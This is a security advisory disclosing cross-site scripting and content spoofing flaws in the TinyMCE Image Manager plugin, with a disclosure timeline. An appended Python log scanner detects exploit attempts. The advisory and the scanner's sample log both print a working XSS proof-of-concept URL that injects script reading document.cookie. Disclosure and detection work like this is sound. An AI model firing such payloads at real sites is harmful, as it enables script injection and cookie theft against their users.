Hello 3APA3A!
These are Cross-Site Scripting and Content Spoofing vulnerabilities in the TinyMCE Image Manager plugin for TinyMCE.
TinyMCE Image Manager 1.1 and previous versions are vulnerable.
Dustweb
http://dustweb.ru/projects/tinymce_images/
Cross-Site Scripting (WASC-08):
http://site/path/images/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
Content Spoofing (WASC-12):
2013.05.18 - announced on my site.
2013.05.18 - informed the developer.
2013.07.12 - disclosed on my site (http://websecurity.com.ua/6517/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
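
Added example (not part of the original advisory, and not code from the plugin or its developer): a log check that flags requests to swfupload.swf whose movieName parameter is not a plain identifier, as in the Cross-Site Scripting URL above. The allowlist, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Assumption: a legitimate movieName is a short identifier such as "SWFUpload_0".
SAFE_MOVIE_NAME = re.compile(r"[A-Za-z0-9_.\-]{1,64}")
# Request line of a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_unquote(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are inspected too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_movie_name(target):
    """Return the decoded movieName if the request targets swfupload.swf with
    a value outside the allowlist (an empty value counts), otherwise None."""
    path, _, query = target.partition("?")
    if not path.lower().endswith("/swfupload.swf"):
        return None
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.lower() == "moviename":
            decoded = fully_unquote(value)
            if not SAFE_MOVIE_NAME.fullmatch(decoded):
                return decoded
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            value = suspicious_movie_name(match.group(1))
            if value is not None:
                hits.append((number, value))
    return hits

# Constructed sample entries; the second carries the URL from the advisory.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Jul/2013:10:00:01 +0000] "GET /path/images/js/swfupload/swfupload.swf?movieName=SWFUpload_0 HTTP/1.1" 200 12345',
    '203.0.113.9 - - [12/Jul/2013:10:00:07 +0000] "GET /path/images/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// HTTP/1.1" 200 12345',
    '203.0.113.5 - - [12/Jul/2013:10:00:09 +0000] "GET /index.php?movieName=%22x HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious movieName {value!r}")
```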